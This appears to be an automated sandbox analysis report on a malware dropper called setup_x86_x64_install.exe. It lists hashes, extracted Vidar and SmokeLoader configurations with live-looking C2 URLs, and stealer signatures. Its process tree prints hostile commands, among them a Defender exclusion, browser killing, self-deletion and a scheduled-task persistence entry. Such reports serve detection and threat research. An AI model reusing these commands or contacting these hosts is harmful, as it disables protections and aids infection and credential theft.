Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Analysis
-
max time kernel
34s -
max time network
1831s -
platform
windows7_x64 -
resource
win7-de -
submitted
07-09-2021 17:58
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
2.9MB
-
MD5
3f1f81101d0ce95fdfac97f5913cd662
-
SHA1
8e615a64e4d72b08926242b7d73a608bdd7e9fce
-
SHA256
90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407
-
SHA512
a776c1f8636ef90d294becf8d09a45366463364026837c19e13227c1c5c9a6656b6fa525e0eec5a1a46997b6ef7066e958c02523a7c4538d046f8b2091145285
Malware Config
Extracted
vidar
40.5
706
https://gheorghip.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
vidar
40.5
916
https://gheorghip.tumblr.com/
-
profile_id
916
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba Payload 1 IoCs
resource yara_rule behavioral4/memory/760-325-0x0000000000400000-0x0000000002F79000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2568 2032 rundll32.exe 10 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2568 2032 rundll32.exe 10 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1724 2032 rundll32.exe 10 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral4/memory/2788-252-0x000000000041C5E2-mapping.dmp family_redline behavioral4/memory/920-302-0x000000000041C5E2-mapping.dmp family_redline behavioral4/memory/1808-313-0x000000000041C5E2-mapping.dmp family_redline behavioral4/memory/760-311-0x00000000033B0000-0x0000000005F29000-memory.dmp family_redline behavioral4/memory/2628-331-0x000000000041C5E2-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 3 IoCs
resource yara_rule behavioral4/files/0x0001000000012f04-117.dat family_socelars behavioral4/files/0x0001000000012f04-142.dat family_socelars behavioral4/files/0x0001000000012f04-149.dat family_socelars -
resource yara_rule behavioral4/files/0x0001000000012f08-111.dat redline behavioral4/files/0x0001000000012f08-135.dat redline behavioral4/files/0x0001000000012f08-131.dat redline behavioral4/files/0x0001000000012f08-130.dat redline behavioral4/files/0x0001000000012f08-161.dat redline behavioral4/files/0x0001000000012f08-160.dat redline -
Vidar Stealer 4 IoCs
resource yara_rule behavioral4/memory/1756-185-0x0000000002F00000-0x0000000002FD1000-memory.dmp family_vidar behavioral4/memory/1756-188-0x0000000000400000-0x0000000002BB2000-memory.dmp family_vidar behavioral4/memory/2516-235-0x00000000030F0000-0x00000000031C1000-memory.dmp family_vidar behavioral4/memory/2516-256-0x0000000000400000-0x0000000002BB2000-memory.dmp family_vidar -
resource yara_rule behavioral4/files/0x0002000000012ef6-72.dat aspack_v212_v242 behavioral4/files/0x0002000000012ef6-71.dat aspack_v212_v242 behavioral4/files/0x0001000000012efc-70.dat aspack_v212_v242 behavioral4/files/0x0001000000012efc-69.dat aspack_v212_v242 behavioral4/files/0x0001000000012efe-75.dat aspack_v212_v242 behavioral4/files/0x0001000000012efe-76.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 12 IoCs
pid Process 1388 setup_installer.exe 1092 setup_install.exe 692 Tue11b9d76a96506.exe 1220 Tue11d7385a978cc.exe 1100 Tue11e4e580f2e8141a3.exe 596 Tue11f251db82fb7b.exe 832 Tue118f55232e4.exe 316 Tue1109eec571ac.exe 1748 Tue11bc0507b56295.exe 1344 Tue11b9d76a96506.tmp 1808 Tue11141271fbe5877f.exe 1756 Tue112c483dd3245d.exe -
Loads dropped DLL 47 IoCs
pid Process 1152 setup_x86_x64_install.exe 1388 setup_installer.exe 1388 setup_installer.exe 1388 setup_installer.exe 1388 setup_installer.exe 1388 setup_installer.exe 1388 setup_installer.exe 1092 setup_install.exe 1092 setup_install.exe 1092 setup_install.exe 1092 setup_install.exe 1092 setup_install.exe 1092 setup_install.exe 1092 setup_install.exe 1092 setup_install.exe 424 cmd.exe 1276 cmd.exe 692 Tue11b9d76a96506.exe 692 Tue11b9d76a96506.exe 1220 Tue11d7385a978cc.exe 1220 Tue11d7385a978cc.exe 1168 cmd.exe 1168 cmd.exe 1380 cmd.exe 1380 cmd.exe 548 cmd.exe 1688 cmd.exe 1672 cmd.exe 692 Tue11b9d76a96506.exe 1672 cmd.exe 1724 cmd.exe 1100 Tue11e4e580f2e8141a3.exe 1100 Tue11e4e580f2e8141a3.exe 1748 Tue11bc0507b56295.exe 1748 Tue11bc0507b56295.exe 1592 cmd.exe 1592 cmd.exe 316 Tue1109eec571ac.exe 316 Tue1109eec571ac.exe 1756 Tue112c483dd3245d.exe 1756 Tue112c483dd3245d.exe 1344 Tue11b9d76a96506.tmp 1344 Tue11b9d76a96506.tmp 1344 Tue11b9d76a96506.tmp 832 Tue118f55232e4.exe 832 Tue118f55232e4.exe 1100 Tue11e4e580f2e8141a3.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 3548 icacls.exe -
resource yara_rule behavioral4/memory/2816-240-0x0000000001020000-0x0000000001021000-memory.dmp themida -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 319 api.2ip.ua 320 api.2ip.ua 46 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
pid pid_target Process procid_target 2684 1756 WerFault.exe 46 2888 2380 WerFault.exe 83 2736 2372 WerFault.exe 60 2056 2664 WerFault.exe 98 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue11bc0507b56295.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue11bc0507b56295.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue11bc0507b56295.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 832 schtasks.exe 3144 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 832 timeout.exe -
Kills process with taskkill 7 IoCs
pid Process 2784 taskkill.exe 2900 taskkill.exe 2996 taskkill.exe 2120 taskkill.exe 3340 taskkill.exe 2484 taskkill.exe 3456 taskkill.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 6 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1748 Tue11bc0507b56295.exe 1748 Tue11bc0507b56295.exe 1340 powershell.exe -
Suspicious use of AdjustPrivilegeToken 37 IoCs
description pid Process Token: SeDebugPrivilege 596 Tue11f251db82fb7b.exe Token: SeCreateTokenPrivilege 832 Tue118f55232e4.exe Token: SeAssignPrimaryTokenPrivilege 832 Tue118f55232e4.exe Token: SeLockMemoryPrivilege 832 Tue118f55232e4.exe Token: SeIncreaseQuotaPrivilege 832 Tue118f55232e4.exe Token: SeMachineAccountPrivilege 832 Tue118f55232e4.exe Token: SeTcbPrivilege 832 Tue118f55232e4.exe Token: SeSecurityPrivilege 832 Tue118f55232e4.exe Token: SeTakeOwnershipPrivilege 832 Tue118f55232e4.exe Token: SeLoadDriverPrivilege 832 Tue118f55232e4.exe Token: SeSystemProfilePrivilege 832 Tue118f55232e4.exe Token: SeSystemtimePrivilege 832 Tue118f55232e4.exe Token: SeProfSingleProcessPrivilege 832 Tue118f55232e4.exe Token: SeIncBasePriorityPrivilege 832 Tue118f55232e4.exe Token: SeCreatePagefilePrivilege 832 Tue118f55232e4.exe Token: SeCreatePermanentPrivilege 832 Tue118f55232e4.exe Token: SeBackupPrivilege 832 Tue118f55232e4.exe Token: SeRestorePrivilege 832 Tue118f55232e4.exe Token: SeShutdownPrivilege 832 Tue118f55232e4.exe Token: SeDebugPrivilege 832 Tue118f55232e4.exe Token: SeAuditPrivilege 832 Tue118f55232e4.exe Token: SeSystemEnvironmentPrivilege 832 Tue118f55232e4.exe Token: SeChangeNotifyPrivilege 832 Tue118f55232e4.exe Token: SeRemoteShutdownPrivilege 832 Tue118f55232e4.exe Token: SeUndockPrivilege 832 Tue118f55232e4.exe Token: SeSyncAgentPrivilege 832 Tue118f55232e4.exe Token: SeEnableDelegationPrivilege 832 Tue118f55232e4.exe Token: SeManageVolumePrivilege 832 Tue118f55232e4.exe Token: SeImpersonatePrivilege 832 Tue118f55232e4.exe Token: SeCreateGlobalPrivilege 832 Tue118f55232e4.exe Token: 31 832 Tue118f55232e4.exe Token: 32 832 Tue118f55232e4.exe Token: 33 832 Tue118f55232e4.exe Token: 34 832 Tue118f55232e4.exe Token: 35 832 Tue118f55232e4.exe Token: SeDebugPrivilege 1808 Tue11e4e580f2e8141a3.exe Token: SeDebugPrivilege 1340 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1152 wrote to memory of 1388 1152 setup_x86_x64_install.exe 27 PID 1152 wrote to memory of 1388 1152 setup_x86_x64_install.exe 27 PID 1152 wrote to memory of 1388 1152 setup_x86_x64_install.exe 27 PID 1152 wrote to memory of 1388 1152 setup_x86_x64_install.exe 27 PID 1152 wrote to memory of 1388 1152 setup_x86_x64_install.exe 27 PID 1152 wrote to memory of 1388 1152 setup_x86_x64_install.exe 27 PID 1152 wrote to memory of 1388 1152 setup_x86_x64_install.exe 27 PID 1388 wrote to memory of 1092 1388 setup_installer.exe 28 PID 1388 wrote to memory of 1092 1388 setup_installer.exe 28 PID 1388 wrote to memory of 1092 1388 setup_installer.exe 28 PID 1388 wrote to memory of 1092 1388 setup_installer.exe 28 PID 1388 wrote to memory of 1092 1388 setup_installer.exe 28 PID 1388 wrote to memory of 1092 1388 setup_installer.exe 28 PID 1388 wrote to memory of 1092 1388 setup_installer.exe 28 PID 1092 wrote to memory of 1348 1092 setup_install.exe 33 PID 1092 wrote to memory of 1348 1092 setup_install.exe 33 PID 1092 wrote to memory of 1348 1092 setup_install.exe 33 PID 1092 wrote to memory of 1348 1092 setup_install.exe 33 PID 1092 wrote to memory of 1348 1092 setup_install.exe 33 PID 1092 wrote to memory of 1348 1092 setup_install.exe 33 PID 1092 wrote to memory of 1348 1092 setup_install.exe 33 PID 1092 wrote to memory of 1276 1092 setup_install.exe 34 PID 1092 wrote to memory of 1276 1092 setup_install.exe 34 PID 1092 wrote to memory of 1276 1092 setup_install.exe 34 PID 1092 wrote to memory of 1276 1092 setup_install.exe 34 PID 1092 wrote to memory of 1276 1092 setup_install.exe 34 PID 1092 wrote to memory of 1276 1092 setup_install.exe 34 PID 1092 wrote to memory of 1276 1092 setup_install.exe 34 PID 1092 wrote to memory of 424 1092 setup_install.exe 53 PID 1092 wrote to memory of 424 1092 setup_install.exe 53 PID 1092 wrote to memory of 424 1092 setup_install.exe 53 PID 1092 wrote to memory of 424 1092 setup_install.exe 53 PID 1092 wrote to memory of 424 1092 setup_install.exe 53 PID 1092 wrote to memory of 424 1092 setup_install.exe 53 PID 1092 wrote to memory of 424 1092 setup_install.exe 53 PID 1092 wrote to memory of 548 1092 setup_install.exe 52 PID 1092 wrote to memory of 548 1092 setup_install.exe 52 PID 1092 wrote to memory of 548 1092 setup_install.exe 52 PID 1092 wrote to memory of 548 1092 setup_install.exe 52 PID 1092 wrote to memory of 548 1092 setup_install.exe 52 PID 1092 wrote to memory of 548 1092 setup_install.exe 52 PID 1092 wrote to memory of 548 1092 setup_install.exe 52 PID 1348 wrote to memory of 1340 1348 cmd.exe 51 PID 1348 wrote to memory of 1340 1348 cmd.exe 51 PID 1348 wrote to memory of 1340 1348 cmd.exe 51 PID 1348 wrote to memory of 1340 1348 cmd.exe 51 PID 1348 wrote to memory of 1340 1348 cmd.exe 51 PID 1348 wrote to memory of 1340 1348 cmd.exe 51 PID 1348 wrote to memory of 1340 1348 cmd.exe 51 PID 424 wrote to memory of 692 424 cmd.exe 50 PID 424 wrote to memory of 692 424 cmd.exe 50 PID 424 wrote to memory of 692 424 cmd.exe 50 PID 424 wrote to memory of 692 424 cmd.exe 50 PID 424 wrote to memory of 692 424 cmd.exe 50 PID 424 wrote to memory of 692 424 cmd.exe 50 PID 424 wrote to memory of 692 424 cmd.exe 50 PID 1276 wrote to memory of 1220 1276 cmd.exe 49 PID 1276 wrote to memory of 1220 1276 cmd.exe 49 PID 1276 wrote to memory of 1220 1276 cmd.exe 49 PID 1276 wrote to memory of 1220 1276 cmd.exe 49 PID 1276 wrote to memory of 1220 1276 cmd.exe 49 PID 1276 wrote to memory of 1220 1276 cmd.exe 49 PID 1276 wrote to memory of 1220 1276 cmd.exe 49 PID 1092 wrote to memory of 1380 1092 setup_install.exe 48
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC658D154\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1348 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1340
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11d7385a978cc.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1276 -
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11d7385a978cc.exeTue11d7385a978cc.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1220
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11e4e580f2e8141a3.exe4⤵
- Loads dropped DLL
PID:1168 -
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exeTue11e4e580f2e8141a3.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1100 -
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exe6⤵PID:2084
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exe6⤵PID:2332
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exe6⤵PID:2788
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exe6⤵PID:1960
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exe6⤵PID:2712
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exe6⤵PID:3060
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exe6⤵PID:920
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1808
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exe6⤵PID:2628
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exe6⤵PID:2052
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exe6⤵PID:1672
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exe6⤵PID:2120
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exe6⤵PID:2828
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exe6⤵PID:1336
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11e4e580f2e8141a3.exe6⤵PID:1716
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue118f55232e4.exe4⤵
- Loads dropped DLL
PID:1688 -
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue118f55232e4.exeTue118f55232e4.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:832 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2896
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:2996
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue112c483dd3245d.exe4⤵
- Loads dropped DLL
PID:1592 -
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue112c483dd3245d.exeTue112c483dd3245d.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1756 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 9606⤵
- Program crash
PID:2684
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11141271fbe5877f.exe4⤵
- Loads dropped DLL
PID:1724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11bc0507b56295.exe4⤵
- Loads dropped DLL
PID:1672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1109eec571ac.exe /mixone4⤵
- Loads dropped DLL
PID:1380
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11f251db82fb7b.exe4⤵
- Loads dropped DLL
PID:548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11b9d76a96506.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:424
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11bc0507b56295.exeTue11bc0507b56295.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:1748
-
C:\Users\Admin\AppData\Local\Temp\is-A5OLK.tmp\Tue11b9d76a96506.tmp"C:\Users\Admin\AppData\Local\Temp\is-A5OLK.tmp\Tue11b9d76a96506.tmp" /SL5="$60130,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11b9d76a96506.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1344 -
C:\Users\Admin\AppData\Local\Temp\is-NT41F.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-NT41F.tmp\46807GHF____.exe" /S /UID=burnerch22⤵PID:2264
-
C:\Program Files\Windows Portable Devices\ISIIWNCLMR\ultramediaburner.exe"C:\Program Files\Windows Portable Devices\ISIIWNCLMR\ultramediaburner.exe" /VERYSILENT3⤵PID:2576
-
C:\Users\Admin\AppData\Local\Temp\is-ABOD7.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-ABOD7.tmp\ultramediaburner.tmp" /SL5="$230178,281924,62464,C:\Program Files\Windows Portable Devices\ISIIWNCLMR\ultramediaburner.exe" /VERYSILENT4⤵PID:3052
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu5⤵PID:2344
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3d-6579d-f75-eac9b-bc5987855c274\Raewowazhybi.exe"C:\Users\Admin\AppData\Local\Temp\3d-6579d-f75-eac9b-bc5987855c274\Raewowazhybi.exe"3⤵PID:1788
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e64⤵PID:1608
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1608 CREDAT:275457 /prefetch:25⤵PID:2596
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1608 CREDAT:406541 /prefetch:25⤵PID:4012
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad4⤵PID:2956
-
-
-
C:\Users\Admin\AppData\Local\Temp\81-e9d79-5ec-ae9b5-f7ccf55ac9464\Nijokaelilae.exe"C:\Users\Admin\AppData\Local\Temp\81-e9d79-5ec-ae9b5-f7ccf55ac9464\Nijokaelilae.exe"3⤵PID:2504
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1sjcygnc.gey\GcleanerEU.exe /eufive & exit4⤵PID:3132
-
C:\Users\Admin\AppData\Local\Temp\1sjcygnc.gey\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\1sjcygnc.gey\GcleanerEU.exe /eufive5⤵PID:1852
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1sjcygnc.gey\GcleanerEU.exe" & exit6⤵PID:368
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f7⤵
- Kills process with taskkill
PID:2484
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aunvlyaj.diq\installer.exe /qn CAMPAIGN="654" & exit4⤵PID:3152
-
C:\Users\Admin\AppData\Local\Temp\aunvlyaj.diq\installer.exeC:\Users\Admin\AppData\Local\Temp\aunvlyaj.diq\installer.exe /qn CAMPAIGN="654"5⤵PID:2604
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\aunvlyaj.diq\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\aunvlyaj.diq\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630778484 /qn CAMPAIGN=""654"" " CAMPAIGN="654"6⤵PID:3640
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aso1ufdb.gsg\anyname.exe & exit4⤵PID:2640
-
C:\Users\Admin\AppData\Local\Temp\aso1ufdb.gsg\anyname.exeC:\Users\Admin\AppData\Local\Temp\aso1ufdb.gsg\anyname.exe5⤵PID:3352
-
C:\Users\Admin\AppData\Local\Temp\aso1ufdb.gsg\anyname.exe"C:\Users\Admin\AppData\Local\Temp\aso1ufdb.gsg\anyname.exe" -u6⤵PID:1596
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s0tgdxcb.d5d\gcleaner.exe /mixfive & exit4⤵PID:3292
-
C:\Users\Admin\AppData\Local\Temp\s0tgdxcb.d5d\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\s0tgdxcb.d5d\gcleaner.exe /mixfive5⤵PID:3240
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\s0tgdxcb.d5d\gcleaner.exe" & exit6⤵PID:3184
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f7⤵
- Kills process with taskkill
PID:3340
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ivjoa3in.3wd\autosubplayer.exe /S & exit4⤵PID:3368
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11141271fbe5877f.exeTue11141271fbe5877f.exe1⤵
- Executes dropped EXE
PID:1808 -
C:\ProgramData\8613322.exe"C:\ProgramData\8613322.exe"2⤵PID:2372
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2372 -s 17363⤵
- Program crash
PID:2736
-
-
-
C:\ProgramData\7593529.exe"C:\ProgramData\7593529.exe"2⤵PID:2500
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"3⤵PID:2944
-
-
-
C:\ProgramData\3359550.exe"C:\ProgramData\3359550.exe"2⤵PID:2816
-
-
C:\ProgramData\2948124.exe"C:\ProgramData\2948124.exe"2⤵PID:1164
-
-
C:\ProgramData\6082714.exe"C:\ProgramData\6082714.exe"2⤵PID:2380
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2380 -s 17603⤵
- Program crash
PID:2888
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11f251db82fb7b.exeTue11f251db82fb7b.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:596 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"2⤵PID:2312
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"3⤵PID:2388
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit4⤵PID:2556
-
